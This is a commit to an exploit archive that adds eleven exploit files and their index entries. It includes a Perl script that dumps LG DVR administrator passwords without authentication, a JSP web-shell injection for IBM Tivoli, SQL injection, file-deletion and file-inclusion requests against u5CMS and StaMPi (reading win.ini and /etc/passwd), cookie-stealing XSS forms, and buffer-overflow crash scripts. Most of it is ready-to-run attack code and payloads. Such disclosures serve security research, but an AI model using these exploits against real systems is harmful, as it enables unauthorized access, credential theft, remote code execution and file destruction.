Update: 2015-02-10

11 new exploits
This commit is contained in:
Offensive Security 2015-02-10 08:36:13 +00:00
parent 43f1ce78ff
commit de2152bda8
12 changed files with 830 additions and 0 deletions

View file

@ -32444,6 +32444,7 @@ id,file,description,date,author,platform,type,port
35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script 'cid' Parameter SQL Injection Vulnerability",2011-07-25,Ehsan_Hp200,php,webapps,0
36000,platforms/php/webapps/36000.txt,"HP Network Automation <= 9.10 SQL Injection Vulnerability",2011-07-28,anonymous,php,webapps,0
36001,platforms/asp/webapps/36001.txt,"Sitecore CMS <= 6.4.1 'url' Parameter URI Redirection Vulnerability",2011-07-28,"Tom Neaves",asp,webapps,0
36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0
36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0
36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 'Mobile Phone' Field HTML Injection Vulnerability",2011-08-01,noptrix,multiple,remote,0
36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin 'tab' Parameter SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
@ -32455,9 +32456,19 @@ id,file,description,date,author,platform,type,port
36011,platforms/asp/webapps/36011.txt,"Ataccan E-ticaret Scripti 'id' Parameter SQL Injection Vulnerability",2011-08-03,Err0R,asp,webapps,0
36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 'pysmb.py' Remote Arbitrary Shell Command Execution Vulnerability",2011-08-03,daveb,multiple,remote,0
36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure exploit",2015-02-07,"Todor Donev",hardware,remote,0
36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0
36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0
36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0
36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0
36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0
36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0
36025,platforms/php/webapps/36025.txt,"u5CMS 3.9.3 - Multiple Open Redirect Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36031,platforms/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,90 @@
#!/usr/bin/perl
#
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
#
#
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
####
#
# Digital video recorder (DVR) surveillance is the use of cameras,
# often hidden or concealed, that use DVR technology to record
# video for playback or immediate viewing. As technological
# innovations have made improvements in the security and
# surveillance industry, DVR surveillance has become more
# prominent and allows for easier and more versatile security
# systems in homes and businesses. A DVR surveillance security
# system can be designed for indoor use or outdoor use and can
# often involve hidden security cameras, concealed “nanny cams”
# for home security, and even personal recording devices hidden
# on a person.
#
####
#
# Description:
# No authentication (login) is required to exploit this vulnerability.
# This program demonstrates how unpatched security bug would enable
# hackers to gain control of a vulnerable device while sitting
# behind their keyboard, potentially thousands of miles away.
# An unauthenticated attacker that is connected to the DVR's may be
# able to retrieve the device's administrator password allowing them
# to directly access the device's configuration control panel.
#
####
#
# Disclaimer:
# This or previous programs is for Educational purpose ONLY. Do not
# use it without permission.The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
####
# Use them at your own risk!
####
#
# $ perl lg.pl 133.7.133.7:80
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
# u/p: admin/000000
# u/p: user1/000000
# u/p: user2/000000
# u/p: user3/000000
# u/p: LOGOUT/000000
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
####
use LWP::Simple;
print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
if (@ARGV == 0) {&usg; &foot;}
while (@ARGV > 0) {
$t = shift(@ARGV);
}
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
for (my $i=0; $i <= 4; $i++){
if ($r =~ m/<name>(.*)<\/name>/g){
print " u\/p: $1\/";
}
if ($r =~ m/<pw>(.*)<\/pw>/g){
print "$1\n";
}
}
&foot;
sub usg(){
print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
sub foot(){
print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
print " http://www.ethical-hacker.org/\n";
exit;
}

69
platforms/jsp/webapps/36002.txt Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
# Date: 12\12\2014
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.ibm.com/
# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
# VU/CVE: VU#782708, CVE-2015-0104
1. Create report
2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:
POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
Host: site
Content-Length: xxx
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>
<%
try {
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");
if (request.getParameter("cmd") != null) {
cmd = new String (request.getParameter("cmd"));
if (OS.startsWith("Windows")) {
cmdarr = new String [] {"cmd", "/C", cmd};
}
else {
cmdarr = new String [] {"/bin/sh", "-c", cmd};
}
Process p = Runtime.getRuntime().exec(cmdarr);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
} catch (Exception e) { e.printStackTrace();}
%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
4. Web shell is now ready to use in path specified in __document parameter's value

104
platforms/linux/dos/36024.txt Executable file
View file

@ -0,0 +1,104 @@
Document Title:
===============
Chemtool 1.6.14 Memory Corruption Vulnerability
Date:
=============
08/02/2015
Vendor Homepage:
================
http://ruby.chemie.uni-freiburg.de/~martin/chemtool/
Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Chemtool 1.6.14.
Affected Product(s):
====================
Chemtool 1.6.14 or older
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An
attacker can crash the software by using an input file.
Also, an attacker can crash the software by entering a filename too long.
b77a8000-b77a9000 r--s 00000000 08:01 152558
/var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
b77aa000-b77bb000 r-xp 00000000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bb000-b77bc000 r--p 00010000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bc000-b77bd000 rw-p 00011000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bd000-b77be000 rwxp 00000000 00:00 0
b77be000-b77bf000 r--p 00855000 08:01 274691
/usr/lib/locale/locale-archive
b77bf000-b77c0000 r--p 00596000 08:01 274691
/usr/lib/locale/locale-archive
b77c0000-b77c2000 rw-p 00000000 00:00 0
b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)
Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers with
userinteraction.
First test. Attacker can generate a malicious file (format .png).This file
can produced a Stack Smashing.
#/usr/bin/ruby
buf = "a"*3000
filename = "crash.png"
file = open(filename,'w')
file.write(buf)
file.close
puts "file created!"
Second test. Attacker can enter a filename too long. For example, this
program needs recieve a parameter. If this parameter is too long, It will
crash.
$chemtool $(perl -e 'print "A"x900')
How to perform:
=======================
1) You can test it with gdb. You attach this application.
2) Run it, now, you can move "crash.png" file that we generated by our ruby
script to the application. Also, you can run argv[1] with a long value.
When you perform above steps so application will crash. Analyze it on gdb.
Solution - Fix & Patch:
=======================
Restrict working maximum size. I believe that this bug doesn't have
solution.
Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of
the local crash method.
Authors:
==================
Pablo González

175
platforms/php/webapps/36023.txt Executable file
View file

@ -0,0 +1,175 @@
# Exploit Title: Radexscript CMS 2.2.0 - SQL Injection vulnerability
# Google Dork: N/A
# Date: 02/09/2015
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://redaxscript.com/
# Software Link: http://redaxscript.com/download/releases
# Version: Redaxscript 2.2.0
# Tested on: Linux
# CVE : CVE-2015-1518
:: PROOF OF CONCEPT ::
POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search
- Vulnerable parameter: $search_terms
- Vulnerable file: redaxscript/includes/search.php
- Vulnerable function: search_post()
- Vulnerable code:
function search_post()
{
/* clean post */
if (ATTACK_BLOCKED < 10)
{
$search_terms = clean($_POST['search_terms'], 5);
}
/* validate post */
if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
{
$error = l('input_incorrect');
}
/* query results */
else
{
$search = array_filter(explode(' ', $search_terms));
$search_keys = array_keys($search);
$last = end($search_keys);
/* query search */
$query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1';
if ($search)
{
$query .= ' && (';
foreach ($search as $key => $value)
{
$query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\'';
if ($last != $key)
{
$query .= ' || ';
}
}
$query .= ')';
}
$query .= ' ORDER BY date DESC LIMIT 50';
$result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
$num_rows = count($result);
if ($result == '' || $num_rows == '')
{
$error = l('search_no');
}
/* collect output */
else if ($result)
{
$accessValidator = new Redaxscript\Validator\Access();
$output = '<h2 class="title_content title_search_result">' . l('search') . '</h2>';
$output .= form_element('fieldset', '', 'set_search_result', '', '', '<span class="title_content_sub title_search_result_sub">' . l('articles') . '</span>') . '<ol class="list_search_result">';
foreach ($result as $r)
{
$access = $r['access'];
/* if access granted */
if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
{
if ($r)
{
foreach ($r as $key => $value)
{
$$key = stripslashes($value);
}
}
/* prepare metadata */
if ($description == '')
{
$description = $title;
}
$date = date(s('date'), strtotime($date));
/* build route */
if ($category == 0)
{
$route = $alias;
}
else
{
$route = build_route('articles', $id);
}
/* collect item output */
$output .= '<li class="item_search_result">' . anchor_element('internal', '', 'link_search_result', $title, $route, $description) . '<span class="date_search_result">' . $date . '</span></li>';
}
else
{
$counter++;
}
}
$output .= '</ol></fieldset>';
/* handle access */
if ($num_rows == $counter)
{
$error = l('access_no');
}
}
}
/* handle error */
if ($error)
{
notification(l('something_wrong'), $error);
}
else
{
echo $output;
}
}
:: SOLUTION ::
Update to Redaxscript 2.3.0
::INFORMATION DISCLOSURE::
- 11/27/2014: Inform the vendor
- 11/28/2014: Vendor confirmed
- 01/29/2015: Vendor releases patch
- 01/05/2015: ITAS Team publishes information
:: REFERENCE ::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-redaxscript-2-2-0-cms-75.html
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).
:: DISCLAIMER ::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

66
platforms/php/webapps/36025.txt Executable file
View file

@ -0,0 +1,66 @@
?
u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities
Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2
Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.
Desc: Input passed via the 'uri' GET parameter in 'meta2.php' script and using
Cookie 'pidvesa' is not properly verified before being used to redirect users.
This can be exploited to redirect a user to an arbitrary website e.g. when a
user clicks a specially crafted link to the affected script hosted on a trusted
domain.
==============================================================================
\u5admin\pidvesa.php:
---------------------
Line 5: if ('<?php echo $_COOKIE['pidvesa']?>'!='') location.href='<?php echo $_COOKIE['pidvesa']?>'+'.php';
==============================================================================
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5227
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5227.php
29.12.2014
---
#1
This request example adds '.php' at the end to the pidvesa cookie value:
GET /u5cms/u5admin/pidvesa.php HTTP/1.1
Host: 10.0.50.3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mkmhuo3gquomkki4lurhap45o3; aclan=de; pidvesa=http://zeroscience.mk/evil/script;
Connection: keep-alive
- To redirect to: http://zeroscience.mk/evil/script.php
--
#2
GET /u5cms/u5admin/meta2.php?uri=http://zeroscience.mk HTTP/1.1

41
platforms/php/webapps/36026.txt Executable file
View file

@ -0,0 +1,41 @@
?
u5CMS 3.9.3 (deletefile.php) Arbitrary File Deletion Vulnerability
Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2
Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.
Desc: Input passed to the 'f' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete
files with the permissions of the web server using their absolute path or via
directory traversal sequences passed within the affected GET parameter.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5226
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5226.php
29.12.2014
---
Target: C:\deleteme.txt
-----------------------
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=/deleteme.txt HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../../../../../../deleteme.txt HTTP/1.1

66
platforms/php/webapps/36027.txt Executable file
View file

@ -0,0 +1,66 @@
?
u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities
Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2
Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.
Desc: Input passed via multiple parameters in multiple scripts is not properly
sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5225
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php
29.12.2014
---
1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1
name=album[INJECT]
2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1
3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1
4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&uri=metai.php HTTP/1.1
5. GET /u5cms/u5admin/metai.php?typ=a&name=album[INJECT] HTTP/1.1
6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1
7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1
name=test[INJECT]&typ=e
8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1
name=album2[INJECT]&ulinks=yes
9. GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum2[INJECT]&typ=a HTTP/1.1

38
platforms/php/webapps/36028.txt Executable file
View file

@ -0,0 +1,38 @@
?
u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability
Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2
Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.
Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when
input passed thru the 'f' parameter to thumb.php script is not properly verified
before being used to include files. This can be exploited to include files from
local resources with their absolute path and with directory traversal attacks.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5224
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php
29.12.2014
---
GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1

101
platforms/php/webapps/36029.txt Executable file
View file

@ -0,0 +1,101 @@
?
u5CMS 3.9.3 Multiple Stored And Reflected XSS Vulnerabilities
Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2
Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.
Desc: u5CMS suffers from multiple stored and reflected cross-site scripting
vulnerabilities. Input passed to several POST and GET parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5223
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5223.php
29.12.2014
---
Reflected XSS:
==============
GET /u5cms/index.php?c=start"><script>alert(1)</script>&l=e&p=1&r= HTTP/1.1
GET /u5cms/index.php?i=1"><script>alert(2)</script>&p=1&c=start&l=d HTTP/1.1
GET /u5cms/index.php?c=start&l=e"><script>alert(3)</script>&p=1&r= HTTP/1.1
GET /u5cms/index.php?c=start&l=e&p=1"><script>alert(4)</script>&r= HTTP/1.1
GET /u5cms/u5admin/cookie.php?a=i2_l%00%3balert(5)//&b=d HTTP/1.1
GET /u5cms/u5admin/cookie.php?a=i2_l&b=%3balert(6)// HTTP/1.1
GET /u5cms/u5admin/copy.php?name=album"><img%20src%3da%20onerror%3dalert(7)> HTTP/1.1
GET /u5cms/u5admin/delete.php?name=a"><img%20src%3da%20onerror%3dalert(8)> HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../r/shortreference/shortreference_en.php.txt'%3balert(9)// HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d'%3balert(10)//&name=shortreference&f=../r/shortreference/shortreference_en.php.txt HTTP/1.1
GET /u5cms/u5admin/done.php?n=inserted%20test"><script>alert(11)</script> HTTP/1.1
GET /u5cms/u5admin/editor.php?c=c"><script>alert(12)</script> HTTP/1.1
POST /u5cms/u5admin/meta2.php?typ=a&uri=metai.php'%3balert(13)// HTTP/1.1
GET /u5cms/u5admin/notdone.php?n=wrong%20name,%20not%20deleted%20<script>alert(14)</script> HTTP/1.1
GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum'%3balert(15)//&typ=a HTTP/1.1
GET /u5cms/u5admin/sendfile.php?name=shortreference&l=_frd"><script>alert(16)</script>&typ=d HTTP/1.1
GET /u5cms/u5admin/characters.php?more=335&s=335"><script>alert(17)</script> HTTP/1.1
Stored XSS:
===========
<html>
<body>
<form action="http://10.0.50.3/u5cms/u5admin/savepage.php" method="POST">
<input type="hidden" name="page" value='ZSL"><script>alert(document.cookie);</script>' />
<input type="hidden" name="view" value="d" />
<input type="hidden" name="ishomepage" value="1" />
<input type="hidden" name="hidden" value="0" />
<input type="hidden" name="logins" value="" />
<input type="hidden" name="title_d" value="Test" />
<input type="hidden" name="desc_d" value="" />
<input type="hidden" name="key_d" value="" />
<input type="hidden" name="content_d" value="Tstz" />
<input type="hidden" name="title_e" value="ZSL" />
<input type="hidden" name="desc_e" value="llll" />
<input type="hidden" name="key_e" value="qqq" />
<input type="hidden" name="content_e" value="AllTheWay" />
<input type="hidden" name="title_f" value="None" />
<input type="hidden" name="desc_f" value="" />
<input type="hidden" name="key_f" value="" />
<input type="hidden" name="content_f" value="Aloha" />
<input type="hidden" name="coco" value="1423010603" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
--
<html>
<body>
<form action="http://10.0.50.3/u5cms/u5admin/new2.php?typ=e" method="POST">
<input type="hidden" name="name" value='"><img%20src%3da%20onerror%3dalert("XSS")>' />
<input type="hidden" name="typ" value="e" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

11
platforms/php/webapps/36031.txt Executable file
View file

@ -0,0 +1,11 @@
# Exploit Title: StaMPi - Local File Inclusion
# Google Dork: "Designed by StaMPi" inurl:fotogalerie.php
# Date: 16/2/15
# Author : e . V . E . L
# Contact: waleed200955@hotmail.com
PoC:
http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00

58
platforms/windows/dos/36022.py Executable file
View file

@ -0,0 +1,58 @@
#!/usr/bin/env python
##########################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
# Date Discovered: 09-02-2015
# Exploit Author: Samandeep Singh ( SaMaN - @samanL33T )
# Vulnerable Software: Moo player 1.3.0
# Software Link: https://mooplayer.jaleco.com/
# Vendor site: https://mooplayer.jaleco.com/
# Version: 1.3.0
# Tested On: Windows XP SP3, Win 7 x86.
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 01DDF92C ntdll.76FF71CD
# 01DDFF5C 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
# 01DDFF44 41414141 AAAA
# 01DDFF48 41414141 AAAA
# 01DDFF4C 41414141 AAAA
# 01DDFF50 41414141 AAAA
# 01DDFF54 41414141 AAAA
# 01DDFF58 41414141 AAAA
# 01DDFF5C 42424242 BBBB Pointer to next SEH record
# 01DDFF60 43434343 CCCC SE handler
# 01DDFF64 00000000 ....
# 01DDFF68 44444444 DDDD
# 01DDFF6C 44444444 DDDD
# 01DDFF70 44444444 DDDD
# And the Registers
# EAX 00000000
# ECX 43434343
# EDX 76FF71CD ntdll.76FF71CD
# EBX 00000000
# ESP 01DDF918
# EBP 01DDF938
# ESI 00000000
# EDI 00000000
# EIP 43434343
head="http://"
buffer=10000
junk="\x41" * 264
nseh = "\x42" * 4
seh = "\x43" * 4
poc = head + junk + nseh + seh
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "mooplay_poc.m3u"
f=open(file,"w")
f.write(head + poc);
f.close();
#SaMaN(@samanL33T)